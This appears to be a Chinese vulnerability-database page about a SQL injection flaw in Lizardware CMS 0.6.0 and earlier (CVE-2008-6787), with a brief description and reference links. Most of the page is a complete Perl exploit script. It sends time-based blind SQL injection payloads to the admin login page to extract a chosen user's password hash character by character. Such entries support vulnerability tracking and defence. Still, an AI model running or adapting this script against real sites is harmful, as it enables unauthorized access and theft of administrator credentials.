https://www.exploit-db.com/exploits/7507
https://cxsecurity.com/issue/WLB-2009050099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-013
Jeremy_Powers Lizardware CMS '/administrator/index.php' SQL注入漏洞






漏洞ID | 1117068 | 漏洞类型 | SQL注入 |
发布时间 | 2008-12-17 | 更新时间 | 2009-05-05 |
![]() |
CVE-2008-6787 | ![]() |
CNNVD-200905-013 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
LizardwareCMS是一款网站内容管理系统(CMS)。LizardwareCMS0.6.0及之前版本中的administrator/index.php存在SQL注入漏洞。远程攻击者可以借助用户参数,执行任意的SQL指令。
|漏洞EXP
#!/usr/bin/perl -w
# Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# http://sourceforge.net/projects/lizardwarecms/
use strict;
use LWP::UserAgent;
my ($stop,$start,$hash);
my $domain = shift;
my $ptable = shift;
my $userid = shift or &usage;
my @chars = (48..57, 97..102);
my $substr = 1;
my $http = new LWP::UserAgent;
&usage unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/;
sub send_request
{
my $post = undef;
my $host = $domain;
my $param = shift @_ or die $!;
$host .= "/administrator/index.php?loginsubmitMTIyOTU0ODExMg== ";
$post = $http->post($host,[
user => $param,
pass => 'anything'
]);
}
sub give_char
{
my $send = undef;
my ($charz,$uidz) = @_;
$send = "' or (select if((ascii(substring".
"(user_password,$uidz,1))=$charz),".
"benchmark(230000000,char(0)),".
"0) from ${ptable}_users where user_id=$userid)#";
return $send;
}
for(1..32)
{
foreach my $set(@chars)
{
my $start = time();
send_request(give_char($set,$substr));
my $stop = time();
if($stop - $start > 6)
{
syswrite(STDOUT,chr($set));
$substr++;
last;
}
}
}
sub usage
{
print "[?] Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit\n";
print "[?] by athos - staker[at]hotmail[dot]it\n";
print "[?] Usage: perl $0 http://[host/path] [table_prefix] [id]\n";
exit;
}
# milw0rm.com [2008-12-17]
|参考资料
来源:XF
名称:lizardwarecms-index-sql-injection(47440)
链接:http://xforce.iss.net/xforce/xfdb/47440
来源:BID
名称:32898
链接:http://www.securityfocus.com/bid/32898
来源:MILW0RM
名称:7507
链接:http://www.milw0rm.com/exploits/7507
检索漏洞
开始时间
结束时间